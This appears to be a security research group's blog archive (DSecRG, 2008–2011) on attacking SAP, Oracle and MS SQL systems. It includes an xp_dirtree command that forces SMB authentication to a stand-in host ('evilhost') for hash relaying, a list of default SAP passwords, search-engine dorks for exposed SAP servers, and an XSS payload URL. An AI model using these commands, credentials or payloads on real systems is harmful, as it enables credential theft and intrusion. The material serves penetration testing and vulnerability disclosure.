But now look at another side of our deal. One of the main things of the successful SMB Relay realization is under which account running MS SQL server. It should be a domain or a local user account, not system’s account like ‘System’ or ‘Local Service’. SQL Server 2000 runs as ‘System’ and SQL Server 2005/2008 runs as ‘Network Service’ by default. This is not good for penetration testers. But our experience of penetration tests is showing that the situations “is not by default” there are very often. Because there are some objectives reasons likes MS SQL server’s limitations when you run it on clustered or domain server, or when you run multiple sql servers on your organization using domain user like DOMAIN\sqlservers for better administration. But this is spread practice to run SQL server under a user account. For more information http://msdn.microsoft.com/en-gb/library/ms143504.aspx

Get access on MS SQL Server.
There are two main ways to interact with MS SQL server. The first is the direct connect to RDBSM via 1433 port when you have good credentials (brutforce/dictionary and other attacks will help you :) The second is an interaction thought another software, a web application for example. There are we should find a SQL injection. A casual or a blind is not important for our purposes. I think this is not a big problem :)

Attack!
For successful SMB Relay attack realization we should enforce MS SQL Server to initiate SMB session on attacker server via UNC path request (\\any.server\any\path). We have some different methods for completing the necessary.
The one of much distributed and useful method is using extended stored procedures.
An extended stored procedure (“xp”) is a dynamic link library that runs directly in the address space of SQL Server. It contains many extended stored procedures for extending SQL Server’s capabilities.
There are three extended procedures available for public access - xp_dirtree, xp_fileexist, xp_getfiledetails. We can use one of them depending on a current situation, because not all they exist in different SQL Server versions or enabled for users or other limitations. We should have “Execute” permission for applying extended stored procedures. Such permissions are granted to ‘public’ role by default. Details you can see in Table 1.
Syntaxes of the extended procedures are one for all:

Example:

EXEC master..xp_dirtree ‘\\evilhost\test’

Table 1

Extended stored procedure	SQL 2000	SQL 2005	SQL 2008 R2
xp_dirtree	Public	Public	Public
xp_fileexist	Public	Public	Public
xp_getfiledetails	Public	not exist	not exist

SMBRelay bible 1: Attacking Enterprise business (ERP)

2011-01-26T04:47:00.000-08:00

Why this attacks are critical for business applications and ERP systems?

The well known PassTheHash vulnerabilities can be used for gaining a shell or password hashes. It is known that possibilities for passing the hash exist in many software but when penetration testing ERP, this type of attack is even more useful due to three things:

1. Most ERP systems use domain accounts or local user accounts for running their processes. For example SAP installs with 2 usernames adm and sap from which SAP processes running. Other ERP systems including custom also use local or domain accounts. This means that PassTheHash will generally provide needed credentials instead if NULL sessions which can be obtained if an application is running under Local Service or System accounts.

2. ERP systems have a lot of file system related functionality that allows you to conduct passthehash attack by inserting string \\fakesmb\anyfile instead of real file name stored on server. This is called PassTheHash phishing - when an attacker sets up an SMB server and try to insert this string into different fields of software and then collect requests with account hashes for the purposes of relaying them (SMBRelay)

3.And the most interesting and previously unknown feature that we found during our penetration test is cluster weakness. Most ERP systems require multiple computer resources to operate. For this reason it is common to see ERP installed in a cluster. During a security assessment it was found that the SMB relay patch from Microsoft did not protect clusters.
Because of this, PassTheHash requests from one node of a cluster to another node of the cluster are possible and it is looks like you make passthehash request on the same server with the same storage. Using this bug it is possible for example to run smbrelay attack on MsSQL server on cluster just by having a user with public rights in MsSQL. Next time we will show how to make it.

So having all those 3 things together makes PassTheHash/SMBRelay a silver bullet for any ERP/Business application system during penetration tests. In next blog posts you will see a practical examples of this attacks in different systems.

New blog section: SMBRelay Bible

2011-01-26T03:07:00.000-08:00

This is the first part of our encyclopedia of pass the hash / smbrealy attacks (SMBRelay Bible). The goal of this encyclopedia is to collect all possibilities of obtaining NTLM authentication for conducting SMB-relay attacks or stealing credentials. We are often use those methodologies in different penetration testings and business- application security assessments and decide to collect all this information in one place. It is very useful area in penetration tests and great example of tactical exploitation methodologies because you don’t need to use any exploit to get full access in corporate network, just pass and relay!

Every week (or two) we will publish different methods of passing the hash in many systems and applications from doc files to ERP systems and many other. Some of methods will be old but perfectly described and categorized and ofcause we will publish many previously unknown examples.

SAPGUI Security: support deadlines

2010-12-07T02:39:00.000-08:00

It is highly recomended to update SAPGUI for latest versions because of Support Deadlines.

SAP GUI for Windows Support Deadlines

6.20: Restricted support applies since 30th of September 2005 (see note 929300 for more information). Support for SAP GUI for Windows 6. 20 will end on 31st of December 2010.

6.40: Finished

7.10: Up to April 12th, 2011.

7.20: Up to April 9th, 2013.

Old versions such as 6.4 may contain vulnerabilities that cannot be patched because support is finished. If you interested what kind of vulnerabilities exist in your installation and how can they harm your company environment you can try free online scanner ERPSCAN Online.

Additional information: Support Note 147519 - Maintenance strategy / deadlines 'SAP GUI'

SAP Application Server Security essentials: default passwords

2010-11-13T09:13:00.000-08:00

One of the easiest and most common ways to hack SAP system is to try to connect using default passwords. Some of them are well-known and some are not (for example TMSADM). All users having default passwords are very powerful.

So if you think that you are great GRC Expert and seeking to secure your SAP environment trying to solve 5-dimensional cross-system SOD conflicts, there are some things you must do right now - CHANGE THESE PASSWORDS!

SAP*:06071992 or PASS clients: 000 001 066 and custom
DDIC:19920706 clients: 000 001 066 and custom
SAPCPIC:ADMIN clients: 000 001 and custom
EARLYWATCH:support clients: 066
TMSADM:password clients: 000 001

P.S. If you think that this is a well-known problem and everybody has already changed it, you are mistaken. During ALL security assessments each time I see at least one system with those passwords.

SAP Infrastructure security internals: Google and Shodan hacking for SAP

2010-11-11T10:12:00.000-08:00

There are still some myths abour SAP security for example that SAP applications are avaiable only internally. Here i collected some simple google hacking and shodanhq hacking tricks that can be used to find SAP servers in the internet.

GOOGLE HACKS

SAP Netweaver abap

inurl:/sap/bc/bsp

SAP Netweaver Portal

inurl:/irj/portal

SAP ITS

unurl:/scripts/wgate
unurl:/scripts/wgate/webgui

SAP BusinessObjects

inurl:infoviewapp

SHODANHQ HACKS

SAP Web Application Server (ICM)

SAP NetWeaver Application Server

SAP Web Application Server

SAP J2EE Engine

SAP Internet Graphics Server

How to get ActiveX version?

2010-09-30T00:59:00.000-07:00

We have the idea: make online scanner for SAP ActiveX vulns. So that every user having SAP GUI can test his software and components for vulnerabilities. It is easy to implement – just get the version of every component and answer whether a component of this version has vulnerabilities or not. On WWW you can find services that test popular software (QuickTime, Flash Player ActiveX, Acrobat Reader ActiveX) but not SAP. Those services get versions using object properties like this object.GetVersion(). For example for Flash – flashActiveX. GetVariable("$version") returns the version number of installed Flash ActiveX. But in some ActiveX components methods like this do not exist. For SAP ActiveX components we cannot get a version number using methods or properties. So what we gonna do? After some research I’ve found the way to determine the version of any ActiveX object. So this is what this post is about 8)

Ok, there’s nothing new, just default functional used for good purposes. For example, how does the browser understand that your ActiveX needs an update? Answer:

<object classid=’CLSID: 0C0F1283-6027-11D1-B766-00A0C9308BE6’ id=’obj’ codebase=’http://server/get.cab#version=5,5,0,0’></object>

So if DLL file version is less than 5.5.0.0 then browser makes GET request “’http://server/get.cab” . So we can make ActiveX version scanner. For example:

...

<object classid=’CLSID: 0C0C0C0C-1111-1111-1111-00AA00AA00AA’ id=’obj1’ codebase=’http://server/get.cab?result=no#version=0,0,0,0’></object>

<object classid=’CLSID: 0C0C0C0C-1111-1111-1111-00AA00AA00AA’ id=’obj2’ codebase=’http://server/get.cab?result=4.x.x.x#version=5,0,0,0’></object>

<object classid=’CLSID: 0C0C0C0C-1111-1111-1111-00AA00AA00AA’ id=’obj3’ codebase=’http://server/get.cab?result=5.0.x.x#version=5,1,0,0’></object>

<object classid=’CLSID: 0C0C0C0C-1111-1111-1111-00AA00AA00AA’ id=’obj4’ codebase=’http://server/get.cab?result=5.1.x.x #version=5,2,0,0’></object>

<object classid=’CLSID: 0C0C0C0C-1111-1111-1111-00AA00AA00AA’ id=’obj5’ codebase=’http://server/get.cab?result=5.2.0-4.x#version=5,2,5,0’></object>

<object classid=’CLSID: 0C0C0C0C-1111-1111-1111-00AA00AA00AA’ id=’obj6’ codebase=’http://server/get.cab?result=5.2.5.x#version=5,3,0,0’></object>

...

If we have 5.2.3.0 version for example in this case we create 4 objects first and then the browser goes for update, and we get the URL: “http://server/get.cab result=5.2.0-4.x”. The last object (obj6) won’t be created cos the browser blocks the other stuff (the same will happen if we have no ActiveX at all, the first GET request will be sent (“http://server/get.cab?result=no”) but 5 following objects will never be parsed and created, and no more GET requests will be sent . So just make get.cab as PHP script that reads the ‘result’ GET parameter. This is my way of detecting the version of ActiveX components without calling methods of an object. Soon (may be next week) you will get SAP GUI scanner based on this idea…

Thank you for your attention.

Alexey Sintsov

[DSecRG]

Chaos Constructions ‘10

2010-09-01T02:34:00.000-07:00

So, it is high time for some blog-writings. Some people have shown interest in Russian Security Festivals, that’s why now I’m writing about this. Yesterday I visited the Russian computer scene festival called Chaos Constructions. While Europe and America have many security-related events, Russia has only two events a year: RuSCrypto and Chaos Constructions (CC) (and I need to say, that CC is not only a security festival, the main idea is a demo-scene, IT security is just a feature). Anyway CC is the main security conference held in Russia, because there are good technical topics and security competitions (like HackQuest and HackVideo). This year there have been seven talks given on security, and there have been described such topics as - SDRF attacks (Vladimir Voroncov), 0-days in drivers of the most popular AV and IDS software (Nikita Tarakanov), the future of Security Scanners (Dmitry Evteev), HTML5 security (Taras Ivashenko and Dmitry Sidorov), Fuzzing (Alexey Troshichev), Win32 exploit mitigations bypass (me) and SCADA security (Andrey Komarov, who unfortunately couldn’t come to the festival). And the good news is that from year to year our security scene is growing at CC. And moreover an ex-member of our team is one of the CC co-organizers by now for many years. So the great thing is that our security community is becoming stronger and I hope that in the future we will arrange a good security festival where we can invite guests to from all over the World.

Photos.
My Presentation (WARN! - Russian lang.)

first public jit-spray exploits (for SAPGUI and Oracle ODC))

2010-03-08T09:20:00.000-08:00

As we give much attention on ERP and Business applications security
you can also download new exploits for popular client side Business applications
such as SAP GUI and Oracle Document Capture that use JIT-Spray
Shellcode.

SAP GUI 7.10 WebViewer3D ActiveX - JIT-Spray Exploit

Oracle Document Capture (EasyMail Objects EMSMTP.DLL 6.0.1) ActiveX Control BOF - JIT-Spray Exploit

Writing JIT-Spray Shellcode for fun and profit

2010-03-07T09:11:00.000-08:00

In this text we are describe how to write a shellcode for new JIT-Spray attacks and make universal STAGE 0 shellcode
that gives control to any common shellcode from MetaSploit, for example.

Author: Alexay Sintsov from Digital Security Research Group (dsecrg.com)

Attacks on clients’ browsers have always been the real threat for everyone.
And here vulnerabilities have been not only in the browser but also in plug-ins.
Bank-clients, business software, antivirus software – all of them use ActiveX (for IE)
for clients and here have been and are still many vulnerabilities.
Vendors make steps to defend us from it. Software vendors patch vulnerabilities and OS vendors
use new mechanisms to prevent attacks at all. But security researchers are trying to find way to bypass these mechanisms.
The new versions of browsers (Internet Explorer 8 and FireFox 3.5) use permanent DEP.
And the new versions of OS use the ASLR mechanism. All this makes the old methods of attacks impossible.
But on BlackHat DC 2010 the interesting way to bypass DEP and ASLR in browsers (not only)
and Just-In-Time compilers was presented. This method is called JIT-SPRAY. But here was no one public PoC until now.

Writing JIT-Spray Shellcode for fun and profit

RSS added to dsecrg.com

2009-04-20T03:32:00.000-07:00

We happy to announce that we finally finished our RSS engine on dsecrg.com so you can use it.

Advisories
Exploits
News
Publications
Summary

Vulnerabilities found by DSecRG in "Top Web Vulnerabilities" rating

2009-04-14T11:46:00.000-07:00

Last vulnerabilities found by DSecRG in SAP WebDB and IBM Websphere took 2'nd and 3'rd place in "Top Web Vulnerabilities" rating, performed by HP Application Security Center Community.

Early vulnerabilities found by DSecRG got into TOP 5 in:

February 2009 (APC PowerChute)
July 2008 (SAP Web Application Server)
March 2008 (Ruby WEBrick)

Penetration from application down to OS. Getting OS access using Oracle Database unprivileged user

2009-04-10T11:05:00.000-07:00

This whitepaper is part of series of publications describing various ways of obtaining access to the server operating system, using vulnerabilities in popular business applications which meet in the corporate environment.

Author: Alexandr Polyakov

Once upon a time during a penetration test of corporate network I got a unprivileged account on Oracle Database and my plan was to get administrative shell on server where its database was installed. Server was running Windows 2003 server operation system and Oracle database was running with privileges of Administrator (not LOCAL_SYSTEM) account. It is a quite common situation, though. Default way is to escalate privileges on database using one of the latest SQL Injection vulnerabilities and then using DBA privileges to gain access to OS using one of the popular methods such as ExtProc, Java, extjob etc. So it seems to be quite simple and I thought about another ways.

What if database is patched with latest CPU updates and additionally it has some kind of Intrusion Detection System which can find 0-day vulnerabilities or something like this and it is impossible to escalate privileges using SQL Injections. Of course there are some methods of escalating privileges without exploits. For example: find cleartext passwords in database or connect to listener internally and rewrite log file or escalate privileges using some dangerous roles such as ‘SELECT ANY DICTIONARY’, ‘CREATE ANY TRIGGER’ or something like this. But this methods can’t give you 100% success. I guess there must be another way maybe not universal but better then described.

In short, this paper describes investigations to get administrative shell on server having unprivileged rights on Oracle Database.

Penetration from application down to OS (Oracle database), (609 KB)

Penetration from application down to OS. Getting OS access using IBM Websphere Application Server vulnerabilities

2009-04-09T10:45:00.000-07:00

This whitepaper opens a series of publications describing various ways of obtaining access to the server operating system, using vulnerabilities in popular business applications which meet in the corporate environment.

Author: Stanislav Svistunovich
In this article describes ways of obtaining access to the server operating system through vulnerabilities in IBM Websphere application server.

Penetration from application down to OS (IBM Websphere), (724 KB)

DSecRG writes exploits for Metasploit

2009-02-18T11:46:00.000-08:00

Researchers from DSecRG join Metasploit project.

The first Metasploit module written by DSecRG and comitted in metasploit trunk is for SQL injection vulnerability in Oracle Database trigger MDSYS.SDO_TOPO_DROP_FTBL.

This vulnerability was published in January CPU 2009.
Metasploit module can be downloaded from Metasploit svn or from our site.

We also rewrote 3 our old exploits for SYS.LT package vulnerabilities from October CPU 2008 and now they can be used in metasploit project:

XSS vulnerability on SecurityFocus.com

2009-02-04T11:45:00.000-08:00

The the most popular security resource in Internet — SecurityFocus.com is vulnerable to XSS attack which was founded in search module by DSecRG researchers. XSS vulnerabilities in search strings is still one of the most popular places.

Example of XSS vulnerability:

http://whitepapers.securityfocus.com/index.php?option=com_advsearch&
task=search&searchword=aaaaa"onmouseover="javascript:alert('
DSecRG_XSS_POC')"style="position:absolute;left:0;top:0;z-index:
99999;width:10000px;height:10000px;"

Vulnerability is fixed now but you can see it in screenshot.

Oracle released Critical Patch Updates Advisory —January 2009

2009-01-14T11:44:00.000-08:00

This CPU contains fix for vulnerability in Oracle Application Server founded by Alexander Polyakov from DSecRG. This vulnerability allows remote attacker gain access to administrators session.

Also in this CPU Oracle provides recognition to DSecRG in Security-In-Depth program (see FAQ) for vulnerabilities in Oracle BEA Weblogic 10 and Oracle Database 11g. People are recognized for Security-In-Depth contributions if they provide information, observations or suggestions pertaining to security vulnerability issues that result in significant modification of Oracle code or documentation in future releases, but are not of such a critical nature that they are distributed in Critical Patch Updates. Additional information about vulnerabilities:

Oracle Application Server (SOA): Linked XSS vulnerability

Oracle BEA Weblogic 10: Multiple Linked ХSS vulnerabilities

Oracle Database 11g: EXFSYS PL/SQL injection vulnerability

Early DSecRG received recognition in "Oracle Critical Patch Update Advisory — July 2008".

First time Oracle thanked DSecRG researchers in "Oracle Critical Patch Update Advisory — January 2008".

We publish 3 new Oracle exploits

2009-01-06T03:07:00.000-08:00

We happy to announce 3 new Oracle Database exploits for vulnerabilities from CPU April 2008. Advisory about this vulnerabilities was published by Esteban Martinez Fayo from Application Security. Brief text from advisory:

"Oracle Database provides the "LT" PL/SQL package that is part of the Oracle Workspace Manager component. This package has multiple instances of SQL Injection in COMPRESSWORKSPACETREE, MERGEWORKSPACE and REMOVEWORKSPACE procedures. Dependening on what Oracle Workspace Manager release is installed, this PL/SQL package is owned by SYS (on older releases) or by WMSYS (on newer releases). A malicious user can call the vulnerable procedures of this package with specially crafted parameters and execute SQL statements with the elevated privileges of the package owner, depending on the system configuration it can be SYS or WMSYS"

Our exploits not only give DBA rights to unprivileged user but also execute Operation System commands (creates new user) using 3 different methods.

SYS.LT.REMOVEWORKSPACE SQL Injection ExploitGrant DBA and create new OS user using advanced extproc method which working in new database versions with updates.
SYS.LT.MERGEWORKSPACE SQL Injection Exploit
Grant DBA and create new OS user using java procedures.
SYS.LT.COMPRESSWORKSPACE SQL Injection Exploit
Grant DBA and create new OS user using database scheduler.

Exploits can be downloaded from our site or from milw0rm.com

Examples of exploits written by DSecRG are used by famous Oracle security researchers in their reports

2008-12-25T02:54:00.000-08:00

In first days of December on the annual Oracle conference in Germany DOAG 2008 famous german Oracle specialist Alexander Kornbrust from red-database-security company read a paper "Best of oracle security 2008". In this paper he used examples of exploits written by DSecRG.

Earlier Alexander Kornbrust talked about examples of our exploits in his report "Best of oracle security 2007".

A famous english Oracle researcher Pete Finnigan also used our exploits in his masterclass "Oracle Security Masterclass" which he presented at many conferences, such as WhiteHat London 2008, OKOUG, Skrr Fall etc.

Different ways to guess Oracle database SID

2008-12-23T01:35:00.000-08:00

This whitepaper is a result of our research in Oracle security and guessing Oracle database SID. In this document I collected all well-known public information about SID guessing and added new techniques which had been succerfully tested during our security audits.

Author: Alexandr (sh2kerr) Polyakov

Nowadays there is a lot of public information about Oracle security and a different vulnerabilities that hacker can use to get access to database. Many of these steps are good explained in public resources and in my paper "Oracle database security". Default user accounts are a big known problem and there are many information about it. As for vulnerabilities there are only 10 percent of DBA’s regularly installing Critical Patch Updates. Access to OS files and shell can be done using many different techniques such as Extproc, Java, DBMS_JOB, UTL_FILE, DBMS_LOB and others. As for rootkits and cleaningaudit data, in this area hackers are one step behind DBA’s. In this information about Oracle security there is one areathat is not so good explained as others. I am talking about getting Oracle SID. Without knowing Oracle database SID attacker cannot get access to database even if he know username and password. With Oracle 10g getting database SID is not so trivial as before. That’s why i decided to research this area and write this document as a result of my researching. In this whitepaper i collect all ways to get database SID and add some new techniques.

Different ways to guess Oracle database SID, (1118 KB)

Uploaded images filter evasion for carrying out XSS attacks

2008-12-22T01:38:00.000-08:00

This article is very old (first published in 25 dec 2007) but many things are still work.

This article describes how to inject javascript code into image file for making XSS attack in different web projects. Also here described methods for bypassing image filters and recomendations for preventing from this attacks.

Author: Alexandr Polyakov

As is known, users can upload images on a Web-server which is provided by numerous Web-projects, such as all kinds of CMS (Bitrix, runCMS, Mambo), forums (PhpBB, vBulluten), mail services (mail.ru, yandex.ru), blogs and social networks (facebook.com, livejournal.com, vkontakte.ru, liveinternet.ru, myspace.com). Such sites are potentially vulnerable to XSS-attacks that can use the flaw in the features of the images handling mechanism in Internet Explorer This feature is not new, but because it is not corrected in Internet Explorer 7.0 we decided to make an article about this problem This feature of the pictures processing and displaying is not new, and the ability to carry out an XSS-attack via picture was known to hackers. Due to the fact that this feature was ignored in the new version of Internet Explorer 7.0, the issue can be discussed again with more features.

XSS in images evasion bypass, (373 KB)

First Post

2008-12-20T03:10:00.000-08:00

We are glad to welcome you on our blog of research laboratory Digital Security company. From this point all information of our researches will be accessible on this blog. Here you always can find last published by us vulnerabilies, exploits, interesting whitepapers and topical news about information security.